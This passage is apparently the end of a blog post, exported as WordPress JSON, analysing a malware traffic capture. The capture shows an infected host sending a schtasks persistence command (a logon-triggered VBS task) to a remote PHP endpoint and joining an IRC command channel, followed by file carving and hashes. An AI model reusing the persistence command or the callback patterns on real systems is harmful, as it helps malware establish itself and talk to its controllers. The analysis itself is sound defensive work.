\r\nGET \/temer\/debug\/index.php?N=FROGGY-PC-SYSTEM%20=%20%20%20%20schtasks%20\/create%20\/tn%20%22SYSFROGGYPC37%22%20\/tr%20%22C:%5CWindows%5CSysWOW64%5CJava%5Cmjpd2buu.3sx.vbs%22%20\/sc%20onlogon%20\/RU%20%22FROGGY-PC%5CMatthew.Frogman%22%20\/F HTTP\/1.1\r\nHost: api.devyatinskiy.ru\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sat, 17 Dec 2016 02:34:53 GMT\r\nServer: Apache\/2.2.22 (Debian)\r\nX-Powered-By: PHP\/5.4.45-0+deb7u5\r\nVary: Accept-Encoding\r\nContent-Length: 153\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text\/html\r\n\r\nFROGGY-PC-SYSTEM =    schtasks \/create \/tn "SYSFROGGYPC37" \/tr "C:\\Windows\\SysWOW64\\Java\\mjpd2buu.3sx.vbs" \/sc onlogon \/RU "FROGGY-PC\\Matthew.Frogman" \/F<\/pre>\n
We then see the system logging into an IRC channel over port 443, but it is not encrypted so it is coming over the line in the clear.<\/p>\n
\r\n...\r\nNICK a37[7]FROGGY-PC-Matt[1329]\r\nUSER Matthew.Frogman 0 * :a37[7]FROGGY-PC-Matt[1329]@iMestreUser.com\r\n:einstein.oftc.net NOTICE AUTH :*** Looking up your hostname...\r\n:einstein.oftc.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead\r\n:einstein.oftc.net 451 ... :You have not registered\r\nPING :113BACA6\r\nPONG 113BACA6\r\n:einstein.oftc.net 001 a37[7]FROGGY-PC-Matt[1329] :Welcome to the fsociety IRC Network a37[7]FROGGY-PC-Matt[1329]!Matthew.Fr@201.16.144.112\r\n:einstein.oftc.net 002 a37[7]FROGGY-PC-Matt[1329] :Your host is einstein.oftc.net, running version Unreal3.2.10.6\r\n:einstein.oftc.net 003 a37[7]FROGGY-PC-Matt[1329] :This server was created Mon Jul 25 2016 at 17:41:29 BRT\r\n:einstein.oftc.net 004 a37[7]FROGGY-PC-Matt[1329] einstein.oftc.net Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ\r\n:einstein.oftc.net 005 a37[7]FROGGY-PC-Matt[1329] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server\r\n:einstein.oftc.net 005 a37[7]FROGGY-PC-Matt[1329] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=fsociety CASEMAPPING=ascii EXTBAN=~,qjncrRa ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server\r\nJOIN #MESTRE\r\n:einstein.oftc.net 005 a37[7]FROGGY-PC-Matt[1329] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS :are supported by this server\r\n:einstein.oftc.net 251 a37[7]FROGGY-PC-Matt[1329] :There are 1 users and 598 invisible on 1 servers\r\n:einstein.oftc.net 252 a37[7]FROGGY-PC-Matt[1329] 2 :operator(s) online\r\n:einstein.oftc.net 253 a37[7]FROGGY-PC-Matt[1329] 2 :unknown connection(s)\r\n:einstein.oftc.net 254 a37[7]FROGGY-PC-Matt[1329] 10 :channels formed\r\n:einstein.oftc.net 255 a37[7]FROGGY-PC-Matt[1329] :I have 599 clients and 0 servers\r\n:einstein.oftc.net 265 a37[7]FROGGY-PC-Matt[1329] 599 4190 :Current local users 599, max 4190\r\n:einstein.oftc.net 266 a37[7]FROGGY-PC-Matt[1329] 599 3779 :Current global users 599, max 3779\r\n:einstein.oftc.net 422 a37[7]FROGGY-PC-Matt[1329] :MOTD File is missing\r\n:a37[7]FROGGY-PC-Matt[1329] MODE a37[7]FROGGY-PC-Matt[1329] :+i\r\n:einstein.oftc.net 473 a37[7]FROGGY-PC-Matt[1329] #MESTRE :Cannot join channel (+i)\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top\r\nPING ssl.houselannister.top\r\n:einstein.oftc.net PONG einstein.oftc.net :ssl.houselannister.top<\/pre>\n
Which would explain why we see the POST to the site log[.]houselannister[.]top. Another oddity is how Wireshark displayed the TCP stream. The POST request is muddled with the response from the server as you can see below. I am not sure if this is something with the PCAP or something else but worth noting.<\/p>\n
\"\"<\/a><\/p>\n
Update<\/strong>
\nSo I had some issues with extracting out the files from the PCAP for some reason. I am not sure if it was just me or something with the actual PCAP. To be honest I used a tool to help pull the files out of the PCAP. So to verify those findings, I saved the server response for the W7.zip file in RAW format, and then installed Foremost on my system. These are the results that I got back from that:<\/p>\n
\r\nFile: w7.raw\r\nStart: Sat Jan 21 18:20:10 2017\r\nLength: Unknown\r\n \r\nNum\t Name (bs=512)\t       Size\t File Offset\t Comment \r\n\r\n0:\t00001648.dll \t     247 KB \t     844282 \t 08\/07\/2011 02:01:56\r\n1:\t00002371.exe \t      98 KB \t    1214150 \t 03\/30\/2014 20:50:41\r\nFinish: Sat Jan 21 18:20:10 2017\r\n\r\n2 FILES EXTRACTED\r\n\t\r\nexe:= 2<\/pre>\n
Looking at the MD5 for those files I get the following:<\/p>\n
File name: 00001648.dll
\nMD5 hash: 5a48d4ed876a12d19e5a9324c073cc73
\nVirustotal: NA<\/p>\n
File name: 00002371.exe
\nMD5 hash: e884a5bdc01b0dc728395b7071ed60a6
\nVirustotal: NA<\/p>\n
As you can see, these are different hashes and file sizes than what I got above. So I am not sure which is correct.<\/p>\n","protected":false},"excerpt":{"rendered":"
Below is my write up of the latest exercise from Brad. There are two things that I learned from doing this exercise: 1) there is a difference between TCP Stream and HTTP Stream as there is more information available in TCP Stream, and 2) how to convert an encoded file from base64 to ASCII. For this last one, I came across Matt Bromiley’s blog covering Brad’s exercise and this was included in his write-up. As usual, all artifacts for this write-up can be found over in my repo located here. Executive Summary ================= Based on my analysis, it looks as…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-662","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/662","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=662"}],"version-history":[{"count":11,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/662\/revisions"}],"predecessor-version":[{"id":711,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/662\/revisions\/711"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=662"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=662"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=662"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}